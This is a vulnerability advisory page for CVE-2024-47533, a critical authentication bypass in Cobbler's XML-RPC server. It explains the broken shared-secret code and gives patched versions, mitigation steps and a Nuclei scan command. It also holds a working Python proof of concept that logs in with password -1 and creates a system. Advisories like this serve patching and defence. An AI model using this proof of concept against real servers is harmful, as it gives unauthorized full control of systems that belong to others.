CVE-2024-47533 is a critical-severity (CVSS 9.8) Improper Authentication vulnerability in cobbler. 2 public exploit or proof-of-concept references are indexed, so weaponization risk is real. A fix is available for cobbler — see the affected versions and patch details below.
Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
- A successful exploit gives an attacker total control of the affected component, not partial access.
Exploitation and automatability from CISA’s SSVC triage for CVE-2024-47533.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
cobbler🐍cobblerReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user '' password -1 and make any changes.
Details
utils.py get_shared_secret:
def get_shared_secret() -> Union[str, int]:
"""
The 'web.ss' file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.
:return: The Cobbler secret which enables full access to Cobbler.
"""
try:
with open("/var/lib/cobbler/web.ss", 'rb', encoding='utf-8') as fd:
data = fd.read()
except:
return -1
return str(data).strip()
Always returns -1 because of the following exception:
binary mode doesn't take an encoding argument
This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.
PoC
#!/usr/bin/python3
import ssl
import xmlrpc.client
params = { 'proto': 'https', 'host': 'COBBLER_SERVER', 'port': '443', 'username': '', 'password': -1 }
ssl_context = ssl._create_unverified_context()
url = '{proto}://{host}:{port}/cobbler_api'.format(**params)
if ssl_context:
conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
conn = xmlrpc.client.Server(url)
try:
token = conn.login(params['username'], params['password'])
except xmlrpc.client.Fault as e:
print("Failed to log in to Cobbler '{url}' as '{username}'. {error}".format(url=url, error=e, **params))
except Exception as e:
print("Connection to '{url}' failed. {error}".format(url=url, error=e, **params))
print("Login success!")
system_id = conn.new_system(token)
Impact
This gives anyone with network access to a cobbler server full control of the server.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | cobbler | ≥ 3.3.0&&< 3.3.7 | 3.3.7pip install --upgrade 'cobbler==3.3.7' |
| 🐍PyPI | cobbler | ≥ 3.0.0&&< 3.2.3 | 3.2.3pip install --upgrade 'cobbler==3.2.3' |
Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for cobbler, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update cobbler to 3.3.7 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2024-47533 is resolved across your whole dependency graph.
Workarounds
Put an independent control in front of the weakness: restrict the affected endpoint or interface to trusted networks, require an additional authentication factor or proxy-level check, and invalidate existing sessions and credentials in case the flaw has already been used.
How to detect CVE-2024-47533
A community-maintained Nuclei template exists for this CVE. You can scan for it directly:
nuclei -id cve-2024-47533 -u https://target- Template
- Cobbler 'XML-RPC' - Authentication Bypass
- Severity
- critical
- Impact
- Anyone with network access can connect to Cobbler XML-RPC with default credentials and make arbitrary changes, gaining full control.
- Remediation
- Update Cobbler to version 3.2.3 or 3.3.7 or later.
Template by ProjectDiscovery nuclei-templates (songyaeji), MIT licensed. View the full template. Scan only systems you are authorised to test.
Frequently Asked Questions
Is CVE-2024-47533 in your dependencies?
Find it across PyPI, including transitive dependencies.